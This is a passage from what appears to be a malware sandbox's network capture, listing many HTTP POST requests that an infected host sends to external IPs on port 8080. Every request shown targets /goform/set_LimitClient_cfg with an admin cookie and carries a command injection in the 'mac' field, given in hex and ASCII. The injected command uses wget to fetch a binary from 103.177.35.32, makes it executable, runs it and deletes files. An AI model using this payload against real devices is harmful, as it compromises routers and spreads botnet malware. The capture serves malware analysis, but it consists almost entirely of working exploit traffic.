                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1334192.168.2.2349636169.152.47.2558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371037960 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1335192.168.2.235736058.128.170.2198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371150017 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1336192.168.2.2340908175.175.133.928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371160030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1337192.168.2.2358156175.197.181.1998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371186018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1338192.168.2.2341184217.170.204.408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371201992 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1339192.168.2.2351316147.201.149.2428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371217966 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1340192.168.2.233721066.85.181.1178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371236086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1341192.168.2.2357554126.70.117.998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371262074 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1342192.168.2.2340790220.115.196.988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371284962 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1343192.168.2.234489060.217.29.2218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371350050 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1344192.168.2.2335200117.60.217.2548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371365070 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1345192.168.2.2341976191.242.122.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371381044 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1346192.168.2.235954087.198.69.848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371406078 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1347192.168.2.2341820109.108.31.1808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371416092 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1348192.168.2.2339330194.180.136.438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371423006 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1349192.168.2.234162413.124.142.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371479988 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1350192.168.2.2358916141.140.17.2158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371496916 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1351192.168.2.2358748213.16.130.1238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371601105 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1352192.168.2.234252285.95.147.368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371624947 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1353192.168.2.2354534151.130.24.18080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371757984 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1354192.168.2.236083824.159.210.568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371761084 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1355192.168.2.2333454131.26.10.1248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371798038 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1356192.168.2.2337494192.136.157.1798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371823072 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
